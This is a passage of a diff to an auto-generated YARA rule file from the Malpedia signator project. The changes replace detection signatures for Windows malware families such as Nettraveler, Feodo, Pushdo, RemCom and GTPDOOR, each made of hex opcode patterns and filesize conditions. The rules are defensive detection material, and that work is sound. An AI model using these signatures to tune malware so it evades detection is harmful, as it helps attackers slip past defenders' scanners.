-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.nettraveler_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.feodo"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.feodo_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "64cd33a7e821a03ef4cb5acc77650adcc2d4e3c4a14efecc6b33e33a7efaa84e"
+		logic_hash = "7ae2a34a3e8eb5aa6b8cbee0b549d59082912ee3877b6eb0ff9194b700931591"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -139177,32 +138884,32 @@ rule MALPEDIA_Win_Nettraveler_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ffd0 50 68???????? ff7510 ff15???????? ff7510 e8???????? }
-		$sequence_1 = { 5e 5d 83c440 c3 56 e8???????? e8???????? }
-		$sequence_2 = { 0bd1 0355b4 8dbc17aac7b6e9 8bd0 8bcf }
-		$sequence_3 = { aa 8bca 33c0 8dbdddefffff 80a5dcf3ffff00 f3ab }
-		$sequence_4 = { ff37 56 ff15???????? 53 ff37 56 ff15???????? }
-		$sequence_5 = { ffd6 bd???????? 8d442418 55 68???????? 50 ffd7 }
-		$sequence_6 = { 53 6a03 53 53 ff75c0 ff75b8 ff7510 }
-		$sequence_7 = { ff7508 ffd6 53 8d8590f6ffff 53 50 }
-		$sequence_8 = { 8db4850cffffff 8b4508 33d2 0fb6803c910010 8bf8 }
-		$sequence_9 = { ff75fc ff15???????? 85c0 7417 8d85f4fdffff 56 }
+		$sequence_0 = { 85c0 747b 6a00 6800000008 }
+		$sequence_1 = { 85d2 740a 03ca 397144 75f3 8b7904 }
+		$sequence_2 = { 6a00 6a03 57 8d442424 50 ff15???????? }
+		$sequence_3 = { ff15???????? 85c0 743d 8d4c2404 }
+		$sequence_4 = { 56 6808020000 8d442444 50 }
+		$sequence_5 = { 83ec0c 56 57 33ff 57 6a02 6a02 }
+		$sequence_6 = { 8bf0 85f6 75e0 6a00 57 }
+		$sequence_7 = { 56 57 ff15???????? 8bf0 85f6 75e0 6a00 }
+		$sequence_8 = { 6a20 8d542404 52 ff15???????? 8d0424 50 }
+		$sequence_9 = { 743d 8d4c2404 51 8d542424 52 }
 
 	condition:
-		7 of them and filesize < 106496
+		7 of them and filesize < 270336
 }
-rule MALPEDIA_Win_Balkan_Door_Auto : FILE
+rule MALPEDIA_Win_Vermilion_Strike_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "da1553c8-1e46-5d28-bd8e-ffaf0075dca2"
+		id = "cccdd0ef-85fa-55e7-a474-5f9b069a3146"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.balkan_door"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.balkan_door_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vermilion_strike"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.vermilion_strike_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "8fad6b0583675ac5acd98c6d6d2bed42312dfeea01b9aec6dd08e0296e917b26"
+		logic_hash = "fbc14feb8d48b183ee7897af8bb71c1d6c19913a32cffa9f35df20729fb944fd"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -139216,32 +138923,32 @@ rule MALPEDIA_Win_Balkan_Door_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 50 ffd7 50 56 68???????? }
-		$sequence_1 = { ffd7 5e 32c0 5f c3 32c0 }
-		$sequence_2 = { ffd7 5e 32c0 5f }
-		$sequence_3 = { 50 57 6a00 6a16 ffb53cefffff ff15???????? 85c0 }
-		$sequence_4 = { 6a26 ffb53cefffff ff15???????? 85c0 750c ff15???????? 8986f8000000 }
-		$sequence_5 = { 740b 6a00 6a00 56 ff15???????? 57 8b3d???????? }
-		$sequence_6 = { 68c0270900 ffd7 6a00 ff35???????? }
-		$sequence_7 = { d1f8 33d2 50 51 8d4dd8 }
-		$sequence_8 = { ffd7 85c0 741a 8d85d0fdffff c785d0fdffff2c020000 50 }
-		$sequence_9 = { ff15???????? 8bf0 85f6 740b 6a00 6a00 56 }
+		$sequence_0 = { 83c414 51 52 b330 8d7c2438 }
+		$sequence_1 = { 8d4e20 51 c744241400000000 e8???????? c7463c00000000 8bc6 8b4c2408 }
+		$sequence_2 = { c644241400 8d7001 8d9b00000000 8a10 40 84d2 }
+		$sequence_3 = { 83c404 56 8bd8 6a00 53 895c2418 e8???????? }
+		$sequence_4 = { 3dea000000 7518 8b74241c 85f6 7410 8d442464 }
+		$sequence_5 = { ffd7 8bf0 83feff 7532 ffd5 }
+		$sequence_6 = { 895c2448 885c2438 39bc2484000000 720d 8b542470 }
+		$sequence_7 = { 396e18 7205 8b4e04 eb03 8d4e04 50 51 }
+		$sequence_8 = { e8???????? 57 50 8d7c245c c684245801000003 e8???????? 83c40c }
+		$sequence_9 = { eb02 8bc7 3bc3 7711 83f908 }
 
 	condition:
-		7 of them and filesize < 352256
+		7 of them and filesize < 540672
 }
-rule MALPEDIA_Win_Collection_Rat_Auto : FILE
+rule MALPEDIA_Win_Bolek_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ee99e95c-7900-562e-8613-68183d72bbe0"
+		id = "69ad8acf-074b-529b-acc6-71dc6d683637"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.collection_rat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.collection_rat_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bolek"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bolek_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "4a525a556c647435c47597aca6c93f4c0c1ae69ffb1c4982506b53b4f472dc0c"
+		logic_hash = "a52d08446edf10d117ae2bacde4f93e5d2e9e0eaf470758c0d7eff835edf2d23"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -139255,34 +138962,34 @@ rule MALPEDIA_Win_Collection_Rat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4885d2 740b 41b001 488bce e8???????? e8???????? }
-		$sequence_1 = { 8d7e78 448bc3 8bd7 e8???????? 448bce 4c8d442440 8d5601 }
-		$sequence_2 = { 488bce e8???????? e8???????? 488bc8 baa3000000 e8???????? 488b8f80000000 }
-		$sequence_3 = { bf18000000 448bc7 33d2 488d8c24a8000000 e8???????? 89bc24a8000000 c78424b800000001000000 }
-		$sequence_4 = { 410fb7cc eb4a 80f92b 7507 b93e000000 eb3e }
-		$sequence_5 = { e8???????? eb27 488b5950 e8???????? 488bc8 ba98000000 e8???????? }
-		$sequence_6 = { c3 418bc4 ebdc 4885d2 0f84aa020000 48895c2408 57 }
-		$sequence_7 = { 488b4c2470 e8???????? eb14 89442420 4533c9 4533c0 }
-		$sequence_8 = { 4183e801 7429 4183e801 741e 4183e801 740f 4183f801 }
-		$sequence_9 = { 4883ec20 4c8b7150 488bd9 b900100000 }
+		$sequence_0 = { f76b10 0fa4ce01 03c9 03c8 8b4340 13f2 f72f }
+		$sequence_1 = { 8bec 83ec18 53 56 57 33c0 8bfa }
+		$sequence_2 = { 8b55f8 391401 7416 41 3bce 72f6 33c0 }
+		$sequence_3 = { 0f84a5000000 8b45f4 8b7028 83c60c 0375e0 e9???????? 8d45e8 }
+		$sequence_4 = { c606ff 3dff000000 751a 6a05 6a06 5a 32c9 }
+		$sequence_5 = { ffb42450080000 50 8d84244c060000 50 e8???????? 8d442444 55 }
+		$sequence_6 = { 899c248c000000 89b42490000000 e8???????? 83c440 85c0 0f85e7fdffff 53 }
+		$sequence_7 = { ff742444 8d442434 50 e8???????? 6a10 8d44243c 55 }
+		$sequence_8 = { ff742438 ff742438 56 e8???????? 69ce0d661900 83c40c 8bf8 }
+		$sequence_9 = { 894dec c745f440000000 894df8 894dfc ff15???????? 8be5 5d }
 
 	condition:
-		7 of them and filesize < 397312
+		7 of them and filesize < 892928
 }
-rule MALPEDIA_Win_Rincux_Auto : FILE
+rule MALPEDIA_Win_Pushdo_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "fcec6357-ec7f-5319-84f9-3e3af9251503"
+		id = "ea9fd106-28fc-55dd-aa56-b9cc29b476a3"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rincux"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.rincux_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pushdo"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.pushdo_auto.yar#L1-L210"
 		license_url = "N/A"
-		logic_hash = "495e2f221b3a3eaf8635ea3eb223efd9431aa4fc4e38116d5df5e0ad084dcaef"
+		logic_hash = "44aafb8e474bf55b9e9061326e2ace4a0bcd7b0153f05d8cb31960fbba3d00f5"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -139294,32 +139001,43 @@ rule MALPEDIA_Win_Rincux_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 50 ff15???????? 89442418 8b442410 50 ff15???????? }
-		$sequence_1 = { 83cafe 42 7534 8a4c2414 8a542410 c644245c01 }
-		$sequence_2 = { 8b8c2494a00000 5f 5e 5d 33c0 5b }
-		$sequence_3 = { 53 55 56 57 0f84ec150000 8b581c 85db }
-		$sequence_4 = { bb06000000 8b04a8 8d7804 8b07 50 ff15???????? 83c704 }
-		$sequence_5 = { 50 68???????? 51 ffd6 8b15???????? 83c40c 8b049508a50210 }
-		$sequence_6 = { 85c0 7477 ff15???????? 83f812 746c 8b6c2418 8b35???????? }
-		$sequence_7 = { 8d4c2424 8d5d1c 52 8d7d10 8d7518 51 53 }
-		$sequence_8 = { 33db 33ed 3bf0 57 89742410 89442414 }
-		$sequence_9 = { 5b 5e 5d c20400 5e b8???????? }
+		$sequence_0 = { f7f9 33c9 ba88020000 f7e2 }
+		$sequence_1 = { 50 ff15???????? 33d2 b9ffff0000 f7f1 }
+		$sequence_2 = { 60 8b45fc b10b d3c0 61 }
+		$sequence_3 = { 8a85effeffff 888415f0feffff 8b4d08 034dfc 0fbe11 }
+		$sequence_4 = { 81ec18010000 6800010000 6a00 8d85f0feffff 50 e8???????? }
+		$sequence_5 = { 8b55fc 3b5510 0f83a6000000 8b45f4 83c001 25ff000000 }
+		$sequence_6 = { 8b450c 0345fc 8810 e9???????? 8be5 }
+		$sequence_7 = { 8b55fc 83c201 8955fc 817dfc00010000 736a 8b45fc }
+		$sequence_8 = { 03c2 c1f808 49 79dd }
+		$sequence_9 = { ff15???????? 8945fc 3bc7 0f84a1010000 8d45ec 50 8d4598 }
+		$sequence_10 = { 7413 8d45f8 50 8d85f0fdffff 50 }
+		$sequence_11 = { 6a04 bb00300000 53 bf00100000 }
+		$sequence_12 = { 0f849f000000 8d45f8 50 6801008000 6801680000 ff75fc }
+		$sequence_13 = { 52 8d8588fbffff 50 e8???????? }
+		$sequence_14 = { 8b5508 8b02 8945f4 837df400 741a 8b4df4 }
+		$sequence_15 = { e8???????? 898544feffff 8b8544feffff 33d2 b90a000000 }
+		$sequence_16 = { 8bff 55 8bec 8b450c c1e810 }
+		$sequence_17 = { eb0f 8b9570fdffff 83c201 899570fdffff 83bd70fdffff14 }
+		$sequence_18 = { 2b4dfc 3b4dec 7307 33c0 e9???????? 8b55fc }
+		$sequence_19 = { e8???????? 8945b8 6a6c 8b4db8 51 e8???????? 8945b8 }
+		$sequence_20 = { 55 8bec 0fb6450c c1f804 83e00f 8b4d08 8a906c520009 }
 
 	condition:
-		7 of them and filesize < 392192
+		7 of them and filesize < 163840
 }
-rule MALPEDIA_Win_Solarbot_Auto : FILE
+rule MALPEDIA_Win_Headertip_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "05e274f3-e1a5-5d28-b9c3-6c8b8c413847"
+		id = "1dda5df3-2437-55ec-aee3-662480184ff3"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.solarbot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.solarbot_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.headertip"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.headertip_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "531287eb552516451607fb4943bd4268dc00786ea51d0ac858b62961b07eaa85"
+		logic_hash = "a8e98ab682cf8297008cac86233820760ccd69da30239b18014120d2702bf71b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -139333,34 +139051,34 @@ rule MALPEDIA_Win_Solarbot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c745f800000000 6a00 8d55fc 52 89da 8b0a }
-		$sequence_1 = { 8945fc 8b7d14 8b4518 8945f4 8b451c c745ec00000000 6a00 }
-		$sequence_2 = { 8b55f8 01d0 50 8b55fc 8b45f8 01c2 52 }
-		$sequence_3 = { 8b85f8feffff 8b5020 0395f0feffff 89d8 c1e002 01c2 }
-		$sequence_4 = { 8b8524f8ffff 0fb610 83fa50 0f8598000000 83bd20f8ffff21 0f868b000000 }
-		$sequence_5 = { 89ca 8d1453 0fb712 85d2 7ff3 89c8 }
-		$sequence_6 = { 8945a8 e9???????? ff75a4 ff75e0 681a040000 }
-		$sequence_7 = { 0f8580020000 8b85d0fdffff 85c0 0f8472020000 c785e0fdffff00000000 bf00000000 be00000000 }
-		$sequence_8 = { 8945e0 eb2d 6a1c 8d45e4 50 }
-		$sequence_9 = { 50 e8???????? 89c3 53 e8???????? 8945f4 89f0 }
+		$sequence_0 = { c645e465 c645e573 c645e674 c645e757 885de8 }
+		$sequence_1 = { 8b450c 48 753a 8b4508 }
+		$sequence_2 = { 0f845b020000 8d4d34 51 50 ff15???????? a3???????? }
+		$sequence_3 = { 84c9 75f1 c20400 8b542404 33c0 85d2 }
+		$sequence_4 = { 56 57 64a130000000 8b400c 8b7014 8bfe }
+		$sequence_5 = { c6451d74 c6451e45 c6451f72 c6452072 c645216f c6452272 885d23 }
+		$sequence_6 = { ff7508 ff35???????? ff15???????? 85c0 7528 }
+		$sequence_7 = { 68???????? be???????? 56 c705????????19100010 c705????????5b120010 ff15???????? }
+		$sequence_8 = { 58 668945f4 668945f6 6a33 58 668945f8 6a32 }
+		$sequence_9 = { 33c0 5f 5b 5e c3 0fb7c7 }
 
 	condition:
-		7 of them and filesize < 204800
+		7 of them and filesize < 174080
 }
-rule MALPEDIA_Win_Session_Manager_Auto : FILE
+rule MALPEDIA_Win_Ketrican_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0581ea0a-3bb4-5759-b879-c839f5bdbdad"
+		id = "17c7dffb-a011-5900-a31d-1d30da8f8252"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.session_manager"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.session_manager_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ketrican"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ketrican_auto.yar#L1-L230"
 		license_url = "N/A"
-		logic_hash = "02f9d1668e1984de7209fb8203b706bf8fb13f2ad60ed57c78494704eeede860"
+		logic_hash = "bc80dac3ff7e066cc7e5cdc3a2c5cdfaac267fb28bf5e233f76a95cbb08049bc"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -139372,32 +139090,45 @@ rule MALPEDIA_Win_Session_Manager_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488bca 4c8d0579970100 83e13f 488bc2 }
-		$sequence_1 = { 4c89b8701c0000 4c89b8781c0000 4c89b8801c0000 4c89b8881c0000 4c89b8901c0000 4c89b8981c0000 4c89b8a01c0000 }
-		$sequence_2 = { 4c89b8c01a0000 4c89b8c81a0000 4c89b8d01a0000 4c89b8d81a0000 4c89b8e01a0000 4c89b8e81a0000 }
-		$sequence_3 = { 0f84d6000000 4c8d155b7e0100 41b90a000000 4b8b04fa }
-		$sequence_4 = { 4c89b8981d0000 4c89b8a01d0000 4c89b8a81d0000 4c89b8b01d0000 4c89b8b81d0000 4c89b8c01d0000 }
-		$sequence_5 = { 488b45d8 488908 488d0d6d720100 488b45d8 8990a8030000 488b45d8 48898888000000 }
-		$sequence_6 = { 4c89b850130000 4c89b858130000 4c89b860130000 4c89b868130000 }
-		$sequence_7 = { 90 4c8d4001 41b901000000 488d1592df0100 488d4dd7 e8???????? }
-		$sequence_8 = { 488d1559e10100 488bcf ff5018 48c7452f0f000000 48897527 }
-		$sequence_9 = { 4c89b818080000 4c89b820080000 4c89b828080000 4c89b830080000 4c89b838080000 4c89b840080000 }
+		$sequence_0 = { 8965f0 33db 895dfc 33c0 }
+		$sequence_1 = { 5e c3 55 8bec 837d0800 7d0a }
+		$sequence_2 = { 8bc1 8945f0 834dfcff e8???????? }
+		$sequence_3 = { e8???????? 83c010 8906 c3 56 8bf1 57 }
+		$sequence_4 = { 5f 5e 8901 5b 5d c20800 680e000780 }
+		$sequence_5 = { 7417 6a0a 6a1f 68???????? }
+		$sequence_6 = { e8???????? cc 8b06 83e810 8b08 395008 }
+		$sequence_7 = { e8???????? 8b06 5d c20400 55 8bec 8b4508 }
+		$sequence_8 = { 8bc7 c1e810 83e03f e8???????? }
+		$sequence_9 = { 2bc6 8b35???????? 53 8bf8 57 }
+		$sequence_10 = { 8bec 8b4508 53 56 57 8d7001 33db }
+		$sequence_11 = { 56 8d4806 57 e8???????? 83c414 8bf0 }
+		$sequence_12 = { 83c604 8345f804 8b45f8 5f c60600 5e }
+		$sequence_13 = { 7706 8a4405bc c9 c3 }
+		$sequence_14 = { eb1f 68???????? e8???????? a3???????? }
+		$sequence_15 = { 8b8a8c2f0000 33c8 e8???????? b8???????? e9???????? }
+		$sequence_16 = { b8???????? e9???????? 8b542408 8d420c 8b8aecfdffff 33c8 e8???????? }
+		$sequence_17 = { e9???????? c705????????ac824100 c3 b9???????? e9???????? }
+		$sequence_18 = { e9???????? 8d45d0 e9???????? 8d4dd0 }
+		$sequence_19 = { e9???????? 8b4508 e9???????? 8b45ec 83e001 0f840c000000 8365ecfe }
+		$sequence_20 = { e9???????? 8d4dd0 e9???????? 8d4de0 e9???????? 8d4db8 e9???????? }
+		$sequence_21 = { e9???????? 8d4ddc e9???????? 8b45d4 83e001 }
+		$sequence_22 = { 8365d4fe 8d4da4 e9???????? c3 8d4dbc e9???????? }
 
 	condition:
-		7 of them and filesize < 372736
+		7 of them and filesize < 1449984
 }
-rule MALPEDIA_Win_Unidentified_096_Auto : FILE
+rule MALPEDIA_Win_Mistcloak_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "14dc2ed1-3b02-5d6b-954c-e104f03f276c"
+		id = "bcb29aaa-c37e-5c55-be1e-5d06aa41cabd"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_096"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_096_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mistcloak"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mistcloak_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "ce476a34a11ac04b46490ceeeb6d4b2e968299e307b980b5713cec9af31b5ce1"
+		logic_hash = "6962ced189f702e03fc18d236cee46a2a0844476537e8c819ea6f1c43f9c0922"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -139411,32 +139142,32 @@ rule MALPEDIA_Win_Unidentified_096_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { a2???????? 81e1ffff0000 5f 83c1f8 5e }
-		$sequence_1 = { 52 e8???????? 83c418 c3 8b0d???????? 51 68???????? }
-		$sequence_2 = { 55 6800000080 55 6800000080 }
-		$sequence_3 = { 68ff000000 52 ff15???????? 5f 5e 33c0 }
-		$sequence_4 = { 85c0 7505 5e 83c40c c3 6a0c }
-		$sequence_5 = { 83c03d eb3f 85ff 8ac1 7d04 }
-		$sequence_6 = { 85ff 7523 8b4c2420 8b54241c 8b442414 51 52 }
-		$sequence_7 = { b024 a2???????? eb3b b025 a2???????? }
-		$sequence_8 = { 7d04 0480 eb35 0470 eb31 }
-		$sequence_9 = { 8b400c 89410c e8???????? 83c410 56 e8???????? }
+		$sequence_0 = { 8b049590500110 f644082801 740b 56 e8???????? 59 8bf0 }
+		$sequence_1 = { 660f282d???????? 660f59f5 660f28aa70100110 660f54e5 660f58fe 660f58fc }
+		$sequence_2 = { 8b0c8590500110 8b45f8 807c012800 7d46 }
+		$sequence_3 = { 0f85b1000000 8b4508 dd00 ebc2 c745e418120110 eb19 }
+		$sequence_4 = { 6bc618 57 8db8104e0110 57 }
+		$sequence_5 = { 7429 83e805 7415 83e801 0f8595010000 c745e408120110 }
+		$sequence_6 = { c745e408120110 e9???????? c745e404120110 e9???????? 894de0 c745e404120110 e9???????? }
+		$sequence_7 = { 85f6 7420 6bc618 57 8db8104e0110 57 }
+		$sequence_8 = { 8bc1 3914c5781a0110 7408 40 }
+		$sequence_9 = { 8b45b4 8b0c8590500110 8a043b 03ce 8b75dc 03cb 43 }
 
 	condition:
-		7 of them and filesize < 25648
+		7 of them and filesize < 196608
 }
-rule MALPEDIA_Win_Neddnloader_Auto : FILE
+rule MALPEDIA_Win_Remcom_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "852b40fe-2e5d-50aa-b642-537ac76dade8"
+		id = "01102b96-17a1-5040-b86b-1c004c22e442"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.neddnloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.neddnloader_auto.yar#L1-L165"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.remcom"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.remcom_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "f033318b8bebdad1df405535c03ee01ef3d70d6b1b4f8bc82d01aaedd0dfc4d8"
+		logic_hash = "6c8707261db4e6b23e09ce2152b2182b004699b6aaba00688b2722f030d121d2"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -139450,38 +139181,32 @@ rule MALPEDIA_Win_Neddnloader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 57 ff15???????? 8b4df8 56 3bc8 }
-		$sequence_1 = { 8d43ff 3bc8 7311 0fb702 0fb731 663bc6 }
-		$sequence_2 = { 8b03 8b5508 69c0b179379e c1e813 33c9 }
-		$sequence_3 = { 0fb731 663bc6 7506 83c102 83c202 }
-		$sequence_4 = { 83c204 3bcf 72f0 8d43ff 3bc8 7311 }
-		$sequence_5 = { eb02 0008 8b45f8 83c0f4 }
-		$sequence_6 = { 57 e8???????? 2b5d10 83c40c }
-		$sequence_7 = { 8d84241c040000 50 68???????? b900230400 }
-		$sequence_8 = { 4133bc8e803c0100 4133bc8680480100 418bc0 41337d20 c1e808 0fb6d0 418bc1 }
-		$sequence_9 = { 488d0587930000 483bc8 7405 e8???????? bf0d000000 }
-		$sequence_10 = { 4533948480590100 458b848c804d0100 410fb6c1 4533848480510100 45335538 410fb6c3 4533848480550100 }
-		$sequence_11 = { 440fb68c29804c0100 c1e810 0fb6c8 41c1e108 0fb68429804c0100 4433c8 }
-		$sequence_12 = { 410fb6c2 41339c8480440100 45337508 410fb6c3 41339c8480400100 }
-		$sequence_13 = { 4433c0 400fb6c7 420fb68420803b0100 41c1e008 }
-		$sequence_14 = { 4883ec28 4c8bc1 4c8d0df20effff 498bc9 e8???????? }
-		$sequence_15 = { 0f94c0 8944244c 488d05caef0000 4a8b14e0 41837c175000 }
+		$sequence_0 = { 6a02 68???????? ffd7 8d4df4 51 6aff 6a00 }
+		$sequence_1 = { 033485e0fc4000 c745e401000000 33db 395e08 7536 6a0a e8???????? }
+		$sequence_2 = { e8???????? 8be5 5d c3 53 56 8d95f8feffff }
+		$sequence_3 = { 56 8b7508 57 8b7d0c 6a44 }
+		$sequence_4 = { ff15???????? 6a00 6a00 6a01 8d4de0 }
+		$sequence_5 = { 33c0 57 8945f8 8945fc 6a01 8d45e0 }
+		$sequence_6 = { 8b7508 57 8b7d0c 6a44 8d85a0feffff }
+		$sequence_7 = { 8bf8 3bfb 746a 56 68ff010f00 68???????? }
+		$sequence_8 = { ffd7 8945f0 eb51 33db 391e 763d }
+		$sequence_9 = { 50 6814120000 8d8de8edffff 51 56 }
 
 	condition:
-		7 of them and filesize < 3438592
+		7 of them and filesize < 155648
 }
-rule MALPEDIA_Win_Plaintee_Auto : FILE
+rule MALPEDIA_Win_Gtpdoor_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c56b0cbf-9d5e-5f6b-9ab4-e8b2c0f5e971"
+		id = "d10f6aa2-6be7-55e5-960c-d33fee6e5026"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.plaintee"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.plaintee_auto.yar#L1-L115"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gtpdoor"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.gtpdoor_auto.yar#L1-L114"
 		license_url = "N/A"
-		logic_hash = "ab35f3cc5b4d32bf6576e8cbf7b0de583ee4e81c86ef4d1d809f91568ce439ac"
+		logic_hash = "a4a736e9e4f2e881c8a24f738313b79d8075e540890609147499da030ceac3c8"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -139495,71 +139220,71 @@ rule MALPEDIA_Win_Plaintee_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83c408 ff15???????? 99 b932000000 8b742410 f7f9 8b4c240c }
-		$sequence_1 = { ffd0 8b4c2400 33c0 83f905 0f94c0 }
-		$sequence_2 = { 7e0f 53 8a1c31 32da }
-		$sequence_3 = { e8???????? 8bf0 eb02 33f6 8bce e8???????? 8a8669010000 }
-		$sequence_4 = { 51 6a00 52 56 50 ff15???????? 83f85a }
-		$sequence_5 = { 8b8d4c010000 83c25a 51 50 }
-		$sequence_6 = { b932000000 8b742410 f7f9 8b4c240c }
-		$sequence_7 = { 6802020000 ff15???????? 85c0 740a b001 }
-		$sequence_8 = { 56 8b74240c 50 8b44240c }
-		$sequence_9 = { 51 8b4c241c 51 ff15???????? }
+		$sequence_0 = { 0fb600 31d0 8801 8045fb01 8345fc01 }
+		$sequence_1 = { 0fb600 31d0 8801 8045fb01 }
+		$sequence_2 = { fc b932000000 b800000000 f3aa }
+		$sequence_3 = { 31d0 8801 8045fb01 8345fc01 }
+		$sequence_4 = { 4989c0 be04000000 e8???????? 0fb785acf9ffff 83c020 }
+		$sequence_5 = { 8b45cc 66895002 c7042400000000 e8???????? }
+		$sequence_6 = { 48833d????????00 4889e5 7416 b800000000 4885c0 740c bf???????? }
+		$sequence_7 = { 83e801 03450c 66c7000a20 c6400200 8b450c }
+		$sequence_8 = { 4929c4 49c1fc03 4d85e4 741e 31ed }
+		$sequence_9 = { c9 c3 55 89e5 83ec18 8b450c 8b5514 }
 
 	condition:
-		7 of them and filesize < 73728
+		7 of them and filesize < 4210688
 }
-rule MALPEDIA_Win_Darkpink_Auto : FILE
